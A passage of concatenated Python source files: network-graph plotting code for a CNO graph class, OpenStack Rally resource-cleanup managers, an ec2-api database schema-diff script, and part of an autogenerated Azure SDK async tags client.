c = XCNOGraph(cnodata("PKN-ToyMMB.sif"), cnodata("MD-ToyMMB.csv"))
c.plot()
The adjacency matrix can be created as follows:
.. plot::
:width: 70%
:include-source:
from cno import XCNOGraph, cnodata
c = XCNOGraph(cnodata("PKN-ToyMMB.sif"), cnodata("MD-ToyMMB.csv"))
c.plot_adjacency_matrix()
"""
nodeNames = sorted(self.nodes())
nodeNamesY = sorted(self.nodes())
nodeNamesY.reverse()
N = len(nodeNames)
data = self.adjacency_matrix(nodelist=nodeNames)
# This is now a sparse matrix (networkx 1.9).
try:
data = data.todense()
except:
pass
pylab.pcolor(pylab.flipud(pylab.array(data)), edgecolors="k", **kargs)
pylab.axis([0, N, 0, N])
pylab.xticks([0.5+x for x in pylab.arange(N)], nodeNames, rotation=90,
fontsize=fontsize)
pylab.yticks([0.5+x for x in pylab.arange(N)], nodeNamesY, rotation=0,
fontsize=fontsize)
try:pylab.tight_layout()
except:pass
def dependency_matrix(self, fontsize=12):
r"""Return dependency matrix
* :math:`D_{i,j}` = green ; species i is an activator of species j (only positive path)
* :math:`D_{i,j}` = red ; species i is an inhibitor of species j (only negative path)
* :math:`D_{i,j}` = yellow; ambivalent (positive and negative paths connecting i and j)
* :math:`D_{i,j}` = red ; species i has no influence on j
.. plot::
:include-source:
:width: 80%
from cno import XCNOGraph, cnodata
c = XCNOGraph(cnodata("PKN-ToyPB.sif"), cnodata("MD-ToyPB.csv"))
c.dependency_matrix()
"""
nodes = sorted(self.nodes())
N = len(nodes)
data = np.zeros((len(nodes), len(nodes)))
for i,node1 in enumerate(nodes):
paths = nx.shortest_path(self, node1)
for j,node2 in enumerate(nodes):
if node1 == node2:
data[i][j] = 0
elif node2 not in paths.keys():
data[i][j] = 0
else:
path = paths[node2]
links = [self.edge[path[ii]][path[ii+1]]["link"] for ii in range(0,len(path)-1)]
if len(np.unique(links)) == 2:
data[i][j] = 1 # yellow
elif "+" in links:
data[i][j] = 2 #green
elif "-" in links:
if links.count("-") % 2 ==0:
data[i][j] = 2
else:
data[i][j] = 3 #red
nodeNames = [node.replace("_", "\_") for node in nodes]
nodeNamesY = [node.replace("_", "\_") for node in nodes]
norm = colors.Normalize(vmin=0, vmax=3)
cmap = colors.ListedColormap([[0., 0, 0], [1,1,0],[.5, 1, 0.], [1., 0, 0.]])
indices = [i for i, node in enumerate(nodes)
if "and" not in node or "+" in nodes]
pylab.clf()
pylab.pcolor(pylab.flipud(data[indices][:,indices]), edgecolors="w",
cmap=cmap, norm=norm);
N = len(indices)
nodeNames = np.array(nodeNames)[indices]
nodeNamesY = np.array(nodeNamesY)[indices[::-1]]
X = [0.5+x for x in range(0, len(nodeNames))]
pylab.xticks(X, nodeNames, rotation=90, fontsize=fontsize)
pylab.yticks(X, nodeNamesY, fontsize=fontsize)
pylab.xlim([0, len(X)])
pylab.ylim([0, len(X)])
def random_cnograph(self, nStimuli=5, nSignals=14, fraction_activation=0.9, nTranscript=5,
nExtraNode=10):
"""
Create the nodes first (stimuli, signals, transcripts, extra nodes). Them
add edges such that the ratio of activation/inhibition is fixed.
no self loop
"""
assert fraction_activation >=0 and fraction_activation<=1
assert nStimuli>=1
assert nExtraNode >= 1
assert nSignals >= 1
assert nTranscript >=1 and nTranscript <= nSignals
self.clear()
# add stimuli
stimuli = ['L' + str(i) for i in range(1, nStimuli+1)]
self.add_nodes_from(stimuli)
self._stimuli = stimuli[:]
signals = ['S' + str(i) for i in range(1, nSignals+1)]
self.add_nodes_from(signals)
self._signals = signals[:]
self.add_nodes_from(['N'+str(i) for i in range(1,nExtraNode+1)])
nodes = self.nodes()
# select the transcript:
transcripts = [x for x in self.nodes() if x not in self.stimuli]
transcripts = transcripts[0:nTranscript]
def get_link():
link = np.random.uniform()
if link < fraction_activation:
return "+"
else:
return "-"
count = 0
N = len(self.nodes())
while nx.is_connected(self.to_undirected()) is False and count < N * 3:
np.random.shuffle(nodes)
n1 = nodes[0]
n2 = nodes[1]
if n2 in self.stimuli or n1 in transcripts:
continue
# ignore self loop
if n1 == n2:
continue
self.add_edge(n1, n2, link=get_link())
count += 1
# some nodes (non-stimuli/non-signals) may have no input connections, which is
# not wanted.
tofix = [x for x in self.nodes() if self.in_degree()[x] == 0 and x.startswith('N')]
for nodetofix in tofix:
nodes = [node for node in self.nodes() if node !=tofix]
np.random.shuffle(nodes)
self.add_edge(nodes[0], nodetofix, link=get_link())
# make sure the ligands are connected:
for stimulus in self._stimuli:
if len(self.successors(stimulus)) == 0:
print("fixing stimulus %s" % stimulus)
nodes = [node for node in self.nodes() if node not in self._stimuli]
np.random.shuffle(nodes)
self.add_edge(stimulus, nodes[0])
def random_poisson_graph(self, n=10, mu=2.5, ratio=0.9,
remove_unconnected=True, Nsignals=5, Nstimuli=5,
remove_self_loops=True, maxtrials=50):
"""Experimental random graph creation"""
count = 0
while count < maxtrials:
self._random_poisson_graph(n, mu, ratio=ratio,
remove_unconnected=remove_unconnected,
remove_self_loops=remove_self_loops)
if nx.is_connected(self.to_undirected()):
count = maxtrials + 1
else:
count += 1
def _random_poisson_graph(self, n=10, mu=2.5, ratio=0.9,
remove_unconnected=True,
remove_self_loops=True, Nsignals=5, Nstimuli=5):
from scipy.stats import poisson
z = [poisson.rvs(mu) for i in range(0,n)]
G = nx.expected_degree_graph(z)
self.clear()
# converts to strings
edges = [(str(e[0]), str(e[1])) for e in G.edges()]
assert ratio >= 0
assert ratio <= 1
N = int(len(edges)* ratio)
edges_pos = edges[0:N]
edges_neg = edges[N:]
self.add_edges_from(edges_pos, link="+")
self.add_edges_from(edges_neg, link="-")
# remove self loop first
if remove_self_loops:
self.remove_self_loops()
if remove_unconnected == False:
# add all nodes (even though they me be unconnected
self.add_nodes_from(G.nodes())
ranks = self.get_same_rank()
sources = ranks[0]
sinks = ranks[max(ranks.keys())]
Nstim = min(len(sources), Nstimuli)
Nsignals = min(len(sinks), Nsignals)
self._stimuli = sources[0:Nstim]
self._signals = sinks[0:Nsignals]
self.set_default_node_attributes()
| |
# Copyright 2014: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from boto import exception as boto_exception
from neutronclient.common import exceptions as neutron_exceptions
from saharaclient.api import base as saharaclient_base
from rally.common import log as logging
from rally.plugins.openstack.context.cleanup import base
from rally.plugins.openstack.scenarios.keystone import utils as kutils
from rally.plugins.openstack.wrappers import keystone as keystone_wrapper
LOG = logging.getLogger(__name__)
def get_order(start):
return iter(range(start, start + 99))
class SynchronizedDeletion(object):
def is_deleted(self):
return True
class QuotaMixin(SynchronizedDeletion):
def id(self):
return self.raw_resource
def delete(self):
self._manager().delete(self.raw_resource)
def list(self):
return [self.tenant_uuid] if self.tenant_uuid else []
# HEAT
@base.resource("heat", "stacks", order=100, tenant_resource=True)
class HeatStack(base.ResourceManager):
pass
# NOVA
_nova_order = get_order(200)
@base.resource("nova", "servers", order=next(_nova_order))
class NovaServer(base.ResourceManager):
def delete(self):
if getattr(self.raw_resource, "OS-EXT-STS:locked", False):
self.raw_resource.unlock()
super(NovaServer, self).delete()
@base.resource("nova", "keypairs", order=next(_nova_order))
class NovaKeypair(SynchronizedDeletion, base.ResourceManager):
pass
@base.resource("nova", "security_groups", order=next(_nova_order))
class NovaSecurityGroup(SynchronizedDeletion, base.ResourceManager):
def list(self):
return filter(lambda x: x.name != "default",
super(NovaSecurityGroup, self).list())
@base.resource("nova", "quotas", order=next(_nova_order),
admin_required=True, tenant_resource=True)
class NovaQuotas(QuotaMixin, base.ResourceManager):
pass
@base.resource("nova", "floating_ips_bulk", order=next(_nova_order),
admin_required=True)
class NovaFloatingIpsBulk(SynchronizedDeletion, base.ResourceManager):
def id(self):
return self.raw_resource.address
def list(self):
return [floating_ip for floating_ip in self._manager().list()
if floating_ip.pool.startswith("rally_fip_pool_")]
# EC2
_ec2_order = get_order(250)
class EC2Mixin(object):
def _manager(self):
return getattr(self.user, self._service)()
@base.resource("ec2", "servers", order=next(_ec2_order))
class EC2Server(EC2Mixin, base.ResourceManager):
def is_deleted(self):
try:
instances = self._manager().get_only_instances(
instance_ids=[self.id()])
except boto_exception.EC2ResponseError as e:
# NOTE(wtakase): Nova EC2 API returns 'InvalidInstanceID.NotFound'
# if instance not found. In this case, we consider
# instance has already been deleted.
return getattr(e, "error_code") == "InvalidInstanceID.NotFound"
# NOTE(wtakase): After instance deletion, instance can be 'terminated'
# state. If all instance states are 'terminated', this
# returns True. And if get_only_instaces() returns empty
# list, this also returns True because we consider
# instance has already been deleted.
return all(map(lambda i: i.state == "terminated", instances))
def delete(self):
self._manager().terminate_instances(instance_ids=[self.id()])
def list(self):
return self._manager().get_only_instances()
# NEUTRON
_neutron_order = get_order(300)
@base.resource(service=None, resource=None, admin_required=True)
class NeutronMixin(SynchronizedDeletion, base.ResourceManager):
# Neutron has the best client ever, so we need to override everything
def _manager(self):
client = self._admin_required and self.admin or self.user
return getattr(client, self._service)()
def id(self):
return self.raw_resource["id"]
def delete(self):
delete_method = getattr(self._manager(), "delete_%s" % self._resource)
delete_method(self.id())
def list(self):
resources = self._resource + "s"
list_method = getattr(self._manager(), "list_%s" % resources)
return filter(lambda r: r["tenant_id"] == self.tenant_uuid,
list_method({"tenant_id": self.tenant_uuid})[resources])
@base.resource("neutron", "port", order=next(_neutron_order),
tenant_resource=True)
class NeutronPort(NeutronMixin):
def delete(self):
if self.raw_resource["device_owner"] == "network:router_interface":
self._manager().remove_interface_router(
self.raw_resource["device_id"],
{"port_id": self.raw_resource["id"]})
else:
try:
self._manager().delete_port(self.id())
except neutron_exceptions.PortNotFoundClient:
# Port can be already auto-deleted, skip silently
LOG.debug("Port %s was not deleted. Skip silently because "
"port can be already auto-deleted."
% self.id())
@base.resource("neutron", "router", order=next(_neutron_order),
tenant_resource=True)
class NeutronRouter(NeutronMixin):
pass
@base.resource("neutron", "pool", order=next(_neutron_order),
tenant_resource=True)
class NeutronV1Pool(NeutronMixin):
pass
@base.resource("neutron", "subnet", order=next(_neutron_order),
tenant_resource=True)
class NeutronSubnet(NeutronMixin):
pass
@base.resource("neutron", "network", order=next(_neutron_order),
tenant_resource=True)
class NeutronNetwork(NeutronMixin):
pass
@base.resource("neutron", "quota", order=next(_neutron_order),
admin_required=True, tenant_resource=True)
class NeutronQuota(QuotaMixin, NeutronMixin):
def delete(self):
self._manager().delete_quota(self.tenant_uuid)
# CINDER
_cinder_order = get_order(400)
@base.resource("cinder", "backups", order=next(_cinder_order),
tenant_resource=True)
class CinderVolumeBackup(base.ResourceManager):
pass
@base.resource("cinder", "volume_snapshots", order=next(_cinder_order),
tenant_resource=True)
class CinderVolumeSnapshot(base.ResourceManager):
pass
@base.resource("cinder", "transfers", order=next(_cinder_order),
tenant_resource=True)
class CinderVolumeTransfer(base.ResourceManager):
pass
@base.resource("cinder", "volumes", order=next(_cinder_order),
tenant_resource=True)
class CinderVolume(base.ResourceManager):
pass
@base.resource("cinder", "quotas", order=next(_cinder_order),
admin_required=True, tenant_resource=True)
class CinderQuotas(QuotaMixin, base.ResourceManager):
pass
# MANILA
_manila_order = get_order(450)
@base.resource("manila", "shares", order=next(_manila_order),
tenant_resource=True)
class ManilaShare(base.ResourceManager):
pass
@base.resource("manila", "share_networks", order=next(_manila_order),
tenant_resource=True)
class ManilaShareNetwork(base.ResourceManager):
pass
@base.resource("manila", "security_services", order=next(_manila_order),
tenant_resource=True)
class ManilaSecurityService(base.ResourceManager):
pass
# GLANCE
@base.resource("glance", "images", order=500, tenant_resource=True)
class GlanceImage(base.ResourceManager):
def list(self):
return self._manager().list(owner=self.tenant_uuid)
# SAHARA
_sahara_order = get_order(600)
@base.resource("sahara", "job_executions", order=next(_sahara_order),
tenant_resource=True)
class SaharaJobExecution(SynchronizedDeletion, base.ResourceManager):
pass
@base.resource("sahara", "jobs", order=next(_sahara_order),
tenant_resource=True)
class SaharaJob(SynchronizedDeletion, base.ResourceManager):
pass
@base.resource("sahara", "job_binary_internals", order=next(_sahara_order),
tenant_resource=True)
class SaharaJobBinaryInternals(SynchronizedDeletion, base.ResourceManager):
pass
@base.resource("sahara", "job_binaries", order=next(_sahara_order),
tenant_resource=True)
class SaharaJobBinary(SynchronizedDeletion, base.ResourceManager):
pass
@base.resource("sahara", "data_sources", order=next(_sahara_order),
tenant_resource=True)
class SaharaDataSource(SynchronizedDeletion, base.ResourceManager):
pass
@base.resource("sahara", "clusters", order=next(_sahara_order),
tenant_resource=True)
class SaharaCluster(base.ResourceManager):
# Need special treatment for Sahara Cluster because of the way the
# exceptions are described in:
# https://github.com/openstack/python-saharaclient/blob/master/
# saharaclient/api/base.py#L145
def is_deleted(self):
try:
self._manager().get(self.id())
return False
except saharaclient_base.APIException as e:
return e.error_code == 404
@base.resource("sahara", "cluster_templates", order=next(_sahara_order),
tenant_resource=True)
class SaharaClusterTemplate(SynchronizedDeletion, base.ResourceManager):
pass
@base.resource("sahara", "node_group_templates", order=next(_sahara_order),
tenant_resource=True)
class SaharaNodeGroup(SynchronizedDeletion, base.ResourceManager):
pass
# CEILOMETER
@base.resource("ceilometer", "alarms", order=700, tenant_resource=True)
class CeilometerAlarms(SynchronizedDeletion, base.ResourceManager):
def id(self):
return self.raw_resource.alarm_id
def list(self):
query = [{
"field": "project_id",
"op": "eq",
"value": self.tenant_uuid
}]
return self._manager().list(q=query)
# ZAQAR
@base.resource("zaqar", "queues", order=800)
class ZaqarQueues(SynchronizedDeletion, base.ResourceManager):
def list(self):
return self.user.zaqar().queues()
# DESIGNATE
_designate_order = get_order(900)
@base.resource("designate", "domains", order=next(_designate_order))
class Designate(SynchronizedDeletion, base.ResourceManager):
pass
@base.resource("designate", "servers", order=next(_designate_order),
admin_required=True, perform_for_admin_only=True)
class DesignateServer(SynchronizedDeletion, base.ResourceManager):
pass
# SWIFT
_swift_order = get_order(1000)
class SwiftMixin(SynchronizedDeletion, base.ResourceManager):
def _manager(self):
client = self._admin_required and self.admin or self.user
return getattr(client, self._service)()
def id(self):
return self.raw_resource
def delete(self):
delete_method = getattr(self._manager(), "delete_%s" % self._resource)
# NOTE(weiwu): *self.raw_resource is required because for deleting
# container we are passing only container name, to delete object we
# should pass as first argument container and second is object name.
delete_method(*self.raw_resource)
@base.resource("swift", "object", order=next(_swift_order),
tenant_resource=True)
class SwiftObject(SwiftMixin):
def list(self):
object_list = []
containers = self._manager().get_account(full_listing=True)[1]
for con in containers:
objects = self._manager().get_container(con["name"],
full_listing=True)[1]
for obj in objects:
raw_resource = [con["name"], obj["name"]]
object_list.append(raw_resource)
return object_list
@base.resource("swift", "container", order=next(_swift_order),
tenant_resource=True)
class SwiftContainer(SwiftMixin):
def list(self):
containers = self._manager().get_account(full_listing=True)[1]
return [[con["name"]] for con in containers]
# MISTRAL
@base.resource("mistral", "workbooks", order=1100, tenant_resource=True)
class MistralWorkbooks(SynchronizedDeletion, base.ResourceManager):
def delete(self):
self._manager().delete(self.raw_resource.name)
# MURANO
_murano_order = get_order(1200)
@base.resource("murano", "environments", tenant_resource=True,
order=next(_murano_order))
class MuranoEnvironments(base.ResourceManager):
pass
@base.resource("murano", "packages", tenant_resource=True,
order=next(_murano_order))
class MuranoPackages(base.ResourceManager):
def list(self):
return filter(lambda x: x.name != "Core library",
super(MuranoPackages, self).list())
# KEYSTONE
_keystone_order = get_order(9000)
class KeystoneMixin(SynchronizedDeletion):
def _manager(self):
return keystone_wrapper.wrap(getattr(self.admin, self._service)())
def delete(self):
delete_method = getattr(self._manager(), "delete_%s" % self._resource)
delete_method(self.id())
def list(self):
# TODO(boris-42): We should use such stuff in all list commands.
resources = self._resource + "s"
list_method = getattr(self._manager(), "list_%s" % resources)
return filter(kutils.is_temporary, list_method())
@base.resource("keystone", "user", order=next(_keystone_order),
admin_required=True, perform_for_admin_only=True)
class KeystoneUser(KeystoneMixin, base.ResourceManager):
pass
@base.resource("keystone", "project", order=next(_keystone_order),
admin_required=True, perform_for_admin_only=True)
class KeystoneProject(KeystoneMixin, base.ResourceManager):
pass
@base.resource("keystone", "service", order=next(_keystone_order),
admin_required=True, perform_for_admin_only=True)
class KeystoneService(KeystoneMixin, base.ResourceManager):
pass
@base.resource("keystone", "role", order=next(_keystone_order),
admin_required=True, perform_for_admin_only=True)
class KeystoneRole(KeystoneMixin, base.ResourceManager):
pass
@base.resource("keystone", "ec2", tenant_resource=True,
order=next(_keystone_order))
class KeystoneEc2(SynchronizedDeletion, base.ResourceManager):
def list(self):
return self._manager().list(self.raw_resource)
| |
#!/usr/bin/env python
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Utility for diff'ing two versions of the DB schema.
Each release cycle the plan is to compact all of the migrations from that
release into a single file. This is a manual and, unfortunately, error-prone
process. To ensure that the schema doesn't change, this tool can be used to
diff the compacted DB schema to the original, uncompacted form.
The schema versions are specified by providing a git ref (a branch name or
commit hash) and a SQLAlchemy-Migrate version number:
Run like:
./tools/db/schema_diff.py mysql master:latest my_branch:82
"""
import datetime
import glob
import os
import subprocess
import sys
### Dump
def dump_db(db_driver, db_name, migration_version, dump_filename):
db_driver.create(db_name)
try:
migrate(db_driver, db_name, migration_version)
db_driver.dump(db_name, dump_filename)
finally:
db_driver.drop(db_name)
### Diff
def diff_files(filename1, filename2):
pipeline = ['diff -U 3 %(filename1)s %(filename2)s' % locals()]
# Use colordiff if available
if subprocess.call(['which', 'colordiff']) == 0:
pipeline.append('colordiff')
pipeline.append('less -R')
cmd = ' | '.join(pipeline)
subprocess.check_call(cmd, shell=True)
### Database
class MySQL(object):
def create(self, name):
subprocess.check_call(['mysqladmin', '-u', 'root', 'create', name])
def drop(self, name):
subprocess.check_call(['mysqladmin', '-f', '-u', 'root', 'drop', name])
def dump(self, name, dump_filename):
subprocess.check_call(
'mysqldump -u root %(name)s > %(dump_filename)s' % locals(),
shell=True)
def url(self, name):
return 'mysql://root@localhost/%s' % name
class Postgres(object):
def create(self, name):
subprocess.check_call(['createdb', name])
def drop(self, name):
subprocess.check_call(['dropdb', name])
def dump(self, name, dump_filename):
subprocess.check_call(
'pg_dump %(name)s > %(dump_filename)s' % locals(),
shell=True)
def url(self, name):
return 'postgres://localhost/%s' % name
def _get_db_driver_class(db_type):
if db_type == "mysql":
return MySQL
elif db_type == "postgres":
return Postgres
else:
raise Exception(_("database %s not supported") % db_type)
### Migrate
MIGRATE_REPO = os.path.join(os.getcwd(), "ec2api/db/sqlalchemy/migrate_repo")
def migrate(db_driver, db_name, migration_version):
earliest_version = _migrate_get_earliest_version()
# NOTE(sirp): sqlalchemy-migrate currently cannot handle the skipping of
# migration numbers.
_migrate_cmd(
db_driver, db_name, 'version_control', str(earliest_version - 1))
upgrade_cmd = ['upgrade']
if migration_version != 'latest':
upgrade_cmd.append(str(migration_version))
_migrate_cmd(db_driver, db_name, *upgrade_cmd)
def _migrate_cmd(db_driver, db_name, *cmd):
manage_py = os.path.join(MIGRATE_REPO, 'manage.py')
args = ['python', manage_py]
args += cmd
args += ['--repository=%s' % MIGRATE_REPO,
'--url=%s' % db_driver.url(db_name)]
subprocess.check_call(args)
def _migrate_get_earliest_version():
versions_glob = os.path.join(MIGRATE_REPO, 'versions', '???_*.py')
versions = []
for path in glob.iglob(versions_glob):
filename = os.path.basename(path)
prefix = filename.split('_', 1)[0]
try:
version = int(prefix)
except ValueError:
pass
versions.append(version)
versions.sort()
return versions[0]
### Git
def git_current_branch_name():
ref_name = git_symbolic_ref('HEAD', quiet=True)
current_branch_name = ref_name.replace('refs/heads/', '')
return current_branch_name
def git_symbolic_ref(ref, quiet=False):
args = ['git', 'symbolic-ref', ref]
if quiet:
args.append('-q')
proc = subprocess.Popen(args, stdout=subprocess.PIPE)
stdout, stderr = proc.communicate()
return stdout.strip()
def git_checkout(branch_name):
subprocess.check_call(['git', 'checkout', branch_name])
def git_has_uncommited_changes():
return subprocess.call(['git', 'diff', '--quiet', '--exit-code']) == 1
### Command
def die(msg):
print >> sys.stderr, "ERROR: %s" % msg
sys.exit(1)
def usage(msg=None):
if msg:
print >> sys.stderr, "ERROR: %s" % msg
prog = "schema_diff.py"
args = ["<mysql|postgres>", "<orig-branch:orig-version>",
"<new-branch:new-version>"]
print >> sys.stderr, "usage: %s %s" % (prog, ' '.join(args))
sys.exit(1)
def parse_options():
try:
db_type = sys.argv[1]
except IndexError:
usage("must specify DB type")
try:
orig_branch, orig_version = sys.argv[2].split(':')
except IndexError:
usage('original branch and version required (e.g. master:82)')
try:
new_branch, new_version = sys.argv[3].split(':')
except IndexError:
usage('new branch and version required (e.g. master:82)')
return db_type, orig_branch, orig_version, new_branch, new_version
def main():
timestamp = datetime.datetime.utcnow().strftime("%Y%m%d_%H%M%S")
ORIG_DB = 'orig_db_%s' % timestamp
NEW_DB = 'new_db_%s' % timestamp
ORIG_DUMP = ORIG_DB + ".dump"
NEW_DUMP = NEW_DB + ".dump"
options = parse_options()
db_type, orig_branch, orig_version, new_branch, new_version = options
# Since we're going to be switching branches, ensure user doesn't have any
# uncommited changes
if git_has_uncommited_changes():
die("You have uncommited changes. Please commit them before running "
"this command.")
db_driver = _get_db_driver_class(db_type)()
users_branch = git_current_branch_name()
git_checkout(orig_branch)
try:
# Dump Original Schema
dump_db(db_driver, ORIG_DB, orig_version, ORIG_DUMP)
# Dump New Schema
git_checkout(new_branch)
dump_db(db_driver, NEW_DB, new_version, NEW_DUMP)
diff_files(ORIG_DUMP, NEW_DUMP)
finally:
git_checkout(users_branch)
if os.path.exists(ORIG_DUMP):
os.unlink(ORIG_DUMP)
if os.path.exists(NEW_DUMP):
os.unlink(NEW_DUMP)
if __name__ == "__main__":
main()
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._tags_operations import build_create_or_update_request, build_create_or_update_value_request, build_delete_request, build_delete_value_request, build_list_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class TagsOperations:
"""TagsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.resource.resources.v2019_08_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace_async
async def delete_value(
self,
tag_name: str,
tag_value: str,
**kwargs: Any
) -> None:
"""Deletes a tag value.
:param tag_name: The name of the tag.
:type tag_name: str
:param tag_value: The value of the tag to delete.
:type tag_value: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_value_request(
tag_name=tag_name,
tag_value=tag_value,
subscription_id=self._config.subscription_id,
template_url=self.delete_value.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete_value.metadata = {'url': '/subscriptions/{subscriptionId}/tagNames/{tagName}/tagValues/{tagValue}'} # type: ignore
@distributed_trace_async
async def create_or_update_value(
self,
tag_name: str,
tag_value: str,
**kwargs: Any
) -> "_models.TagValue":
"""Creates a tag value. The name of the tag must already exist.
:param tag_name: The name of the tag.
:type tag_name: str
:param tag_value: The value of the tag to create.
:type tag_value: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: TagValue, or the result of cls(response)
:rtype: ~azure.mgmt.resource.resources.v2019_08_01.models.TagValue
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.TagValue"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_create_or_update_value_request(
tag_name=tag_name,
tag_value=tag_value,
subscription_id=self._config.subscription_id,
template_url=self.create_or_update_value.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('TagValue', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('TagValue', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update_value.metadata = {'url': '/subscriptions/{subscriptionId}/tagNames/{tagName}/tagValues/{tagValue}'} # type: ignore
@distributed_trace_async
async def create_or_update(
self,
tag_name: str,
**kwargs: Any
) -> "_models.TagDetails":
"""Creates a tag in the subscription.
The tag name can have a maximum of 512 characters and is case insensitive. Tag names created by
Azure have prefixes of microsoft, azure, or windows. You cannot create tags with one of these
prefixes.
:param tag_name: The name of the tag to create.
:type tag_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: TagDetails, or the result of cls(response)
:rtype: ~azure.mgmt.resource.resources.v2019_08_01.models.TagDetails
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.TagDetails"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_create_or_update_request(
tag_name=tag_name,
subscription_id=self._config.subscription_id,
template_url=self.create_or_update.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('TagDetails', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('TagDetails', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/tagNames/{tagName}'} # type: ignore
@distributed_trace_async
async def delete(
self,
tag_name: str,
**kwargs: Any
) -> None:
"""Deletes a tag from the subscription.
You must remove all values from a resource tag before you can delete it.
:param tag_name: The name of the tag.
:type tag_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_request(
tag_name=tag_name,
subscription_id=self._config.subscription_id,
template_url=self.delete.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/tagNames/{tagName}'} # type: ignore
@distributed_trace
def list(
self,
**kwargs: Any
) -> AsyncIterable["_models.TagsListResult"]:
"""Gets the names and values of all resource tags that are defined in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either TagsListResult or the result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.resource.resources.v2019_08_01.models.TagsListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.TagsListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
